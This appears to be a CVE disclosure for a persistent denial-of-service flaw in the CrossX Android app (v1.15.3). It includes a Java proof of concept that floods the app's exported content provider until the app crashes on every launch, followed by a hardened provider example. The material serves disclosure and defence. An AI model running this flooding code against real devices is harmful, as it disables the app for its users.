CVE-2023-29767: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause a persistent denial of service via the database files.


Denial of Service exists in CrossX (CVE-2023-29767)

Vendor: CROSSX SOLUÇÕES MOBILE LTDA (https://appcrossx.com/)

Affected product: CrossX (com.startapps.crossx)

Version: 1.15.3

Download link: https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE: An issue found in CrossX v.1.15.3 allows a local attacker to cause a persistent denial of service via the database files.

Additional information: The CrossX application allows unauthorized applications to inject data into its database through interfaces in the components it exposes. That data is loaded from the database into memory when the app is opened. Once an attacker has injected an excessive amount of data, the application triggers an OOM error and crashes. Restarting the application does not fix the problem, because the data is stored persistently in the database, so the result is a persistent denial of service.

PoC:

    // getRandomString() is the PoC author's helper; its body is not shown on the page.
    public void attack_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }
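A defensive counterpart to the PoC above, added here as an example and not taken from CrossX or the advisory: a provider that refuses writes from other UIDs and bounds both field length and row count, so the table loaded at startup cannot grow without limit. The class name, database name and both limits are assumptions; only `tb_user` and `email` come from the PoC.

```java
import android.content.*;
import android.database.*;
import android.database.sqlite.*;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;
// Hypothetical provider for illustration; not CrossX code.
public class HardenedUserProvider extends ContentProvider {
    private static final String TABLE = "tb_user";   // table name taken from the PoC URI
    private static final int MAX_EMAIL_CHARS = 320;  // assumed per-field cap
    private static final long MAX_ROWS = 1000;       // assumed cap on rows loaded at startup
    private SQLiteOpenHelper helper;
    @Override public boolean onCreate() {
        helper = new SQLiteOpenHelper(getContext(), "example.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE " + TABLE + " (_id INTEGER PRIMARY KEY, email TEXT)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
        };
        return true;
    }
    // Reject callers outside the app's own UID, even if the manifest exports the provider.
    private void enforceOwnUid() {
        if (Binder.getCallingUid() != Process.myUid()) throw new SecurityException("caller uid not allowed");
    }
    @Override public Uri insert(Uri uri, ContentValues values) {
        enforceOwnUid();
        String email = values == null ? null : values.getAsString("email");
        if (email == null || email.length() > MAX_EMAIL_CHARS) {    // bound each stored value
            throw new IllegalArgumentException("email missing or too long");
        }
        SQLiteDatabase db = helper.getWritableDatabase();
        if (DatabaseUtils.queryNumEntries(db, TABLE) >= MAX_ROWS) { // bound total table size
            throw new IllegalStateException("row limit reached");
        }
        ContentValues clean = new ContentValues();                  // copy only known columns
        clean.put("email", email);
        long id = db.insert(TABLE, null, clean);
        return id < 0 ? null : ContentUris.withAppendedId(uri, id);
    }
    @Override public Cursor query(Uri u, String[] proj, String sel, String[] args, String sort) {
        enforceOwnUid();
        return helper.getReadableDatabase().query(TABLE, proj, sel, args, null, null, sort);
    }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri u, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri u) { return null; }
}
```

Declaring the provider with `android:exported="false"` in the manifest, or guarding it with a signature-level permission, is the primary fix; the UID check and size caps are a backstop if that declaration is ever changed.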
